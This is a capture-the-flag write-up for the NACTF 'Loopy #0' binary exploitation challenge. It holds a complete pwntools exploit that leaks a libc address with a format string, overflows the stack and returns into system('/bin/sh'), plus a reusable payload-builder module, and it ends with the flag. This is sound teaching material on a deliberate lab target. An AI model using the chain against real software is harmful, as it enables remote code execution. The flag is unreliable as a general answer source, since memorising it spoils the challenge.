Loopy #0
Binary Exploitation - Points: 350
This program is quite short, but has got printf and gets in it! This shouldn't be too hard, right?
Connect at nc shell.2019.nactf.com 31283
The exploit uses a format string to leak the libc address of printf: the binary's GOT entry for printf is placed at the start of the input buffer, and "%4$s" makes printf dereference it (our buffer is the 4th printf argument on the 32-bit stack) and print the resolved pointer. With that leak and the libc.so.6 shipped with the challenge we can calculate the libc base address. The same input also overflows the buffer and overwrites the saved return address with the address of vuln, so the vulnerable function is called again and we get to send a second input.
With the libc base address we calculate the addresses of system and the "/bin/sh" string inside libc, overflow the buffer a second time and return into system with "/bin/sh" as its argument (classic 32-bit ret2libc: return address, fake return address for system, then the argument) to spawn a shell.
Exploit script:
from pwn import *

# libc shipped with the challenge: offsets of system and the "/bin/sh" string
libc = ELF('libc.so.6')
system = libc.symbols['system']
shell = next(libc.search(b'/bin/sh'))
libc_printf = libc.symbols['printf']   # offset of the symbol we leak

e = ELF('loopy-0')
printf = e.got['printf']               # GOT slot holding printf's resolved libc address

# p = remote('shell.2019.nactf.com', 31283)
p = process('./loopy-0')

# Stage 1: GOT address at the start of the buffer, "%4$s" dereferences it (our buffer
# is the 4th printf argument), 68 bytes of padding fill the remaining space up to the
# saved return address (76 bytes in total), which we point back at vuln for a 2nd input.
payload = p32(printf) + b'%4$s' + b'A' * 68 + p32(e.symbols['vuln'])
p.sendline(payload)

p.recvuntil(b'You typed: ')
p.recv(4)                              # the raw GOT address bytes echoed back
leak = u32(p.recv(4))                  # the 4 bytes %4$s printed: printf inside libc
log.info("leak: " + hex(leak))

libc_base = leak - libc_printf
system = libc_base + system
shell = libc_base + shell
log.info("libc base @ " + hex(libc_base))
log.info("system @ " + hex(system))
log.info("shell @ " + hex(shell))

# Stage 2: 32-bit ret2libc. Return address -> system, fake return address for system
# (0x0, so the process just crashes after the shell exits), then the pointer to
# "/bin/sh" as system's first argument.
p.sendline(b'A' * 76 + p32(system) + p32(0x0) + p32(shell))
p.interactive()
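As an added example (not part of the original writeup or of the challenge files), the same two-stage logic factored into small functions that can be checked offline with only the standard library, plus the sanity checks a practitioner wants before firing the exploit: the address placed at the front of the buffer must not contain 0x0a (gets stops there) or 0x00 (printf stops there, cutting off the "%4$s" that follows), the echoed bytes must start with the GOT address we sent (otherwise the "%N$" index is wrong), and the computed libc base must be page aligned (otherwise the libc build or symbol is wrong). All addresses and offsets in the comments and tests are constructed values, not those of the challenge binary or its libc.

```python
import struct

PAGE = 0x1000

def p32(x):
    """Little-endian 32-bit pack, equivalent to pwntools p32."""
    return struct.pack("<I", x & 0xffffffff)

def u32(b):
    """Little-endian 32-bit unpack, equivalent to pwntools u32."""
    return struct.unpack("<I", b)[0]

def check_address_bytes(addr):
    """An address that sits inside the format string must survive gets() and printf():
    gets() stops reading at 0x0a, printf() stops reading the format at 0x00."""
    raw = p32(addr)
    if any(c in (0x00, 0x0a) for c in raw):
        raise ValueError("address %#x contains a 0x00 or 0x0a byte" % addr)
    return raw

def build_leak_payload(got_addr, vuln_addr, buf_len=76, fmt=b"%4$s"):
    """Stage 1: GOT address at the start of the buffer, a format string that reads it
    back as a C string (the leaked pointer), padding up to the saved return address,
    then the address of the vulnerable function so we get a second input."""
    body = check_address_bytes(got_addr) + fmt
    if len(body) > buf_len:
        raise ValueError("format string does not fit in the buffer")
    return body + b"A" * (buf_len - len(body)) + p32(vuln_addr)

def parse_leak(output, got_addr, marker=b"You typed: "):
    """The program echoes the buffer through printf: marker, the 4 raw GOT address
    bytes, then the 4 bytes that %4$s printed (printf's resolved libc address)."""
    i = output.index(marker) + len(marker)
    if output[i:i + 4] != p32(got_addr):
        raise ValueError("echo does not start with the GOT address; check the %N$ index")
    return u32(output[i + 4:i + 8])

def libc_base_from_leak(leak, libc_sym_offset):
    """Subtract the symbol's offset in the matching libc build; the base must be
    page aligned, anything else means the wrong libc or the wrong symbol."""
    base = leak - libc_sym_offset
    if base & (PAGE - 1):
        raise ValueError("base %#x is not page aligned" % base)
    return base

def build_ret2libc_payload(system_addr, binsh_addr, buf_len=76, ret_after=0):
    """Stage 2 (32-bit cdecl): saved return address -> system, a fake return address
    for system, then the pointer to "/bin/sh" as system's first argument."""
    return b"A" * buf_len + p32(system_addr) + p32(ret_after) + p32(binsh_addr)

if __name__ == "__main__":
    # Constructed values for a dry run; the real ones come from ELF('loopy-0') / libc.
    got_printf, vuln = 0x0804a010, 0x080484b6
    stage1 = build_leak_payload(got_printf, vuln)
    fake_echo = b"You typed: " + p32(got_printf) + p32(0xf7e0a670) + b"A" * 68 + b"\n"
    base = libc_base_from_leak(parse_leak(fake_echo, got_printf), 0x49670)
    stage2 = build_ret2libc_payload(base + 0x3ada0, base + 0x15ba0b)
    print("libc base %#x, stage 1 %d bytes, stage 2 %d bytes" % (base, len(stage1), len(stage2)))
```

The 76-byte distance to the return address, the "%4$s" index and the symbol offsets are the parameters that change from binary to binary; everything else in the chain is the same for any 32-bit gets/printf target without a stack canary or PIE.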
flag: nactf{jus7_c411_17_4g41n_AnZPLmjm}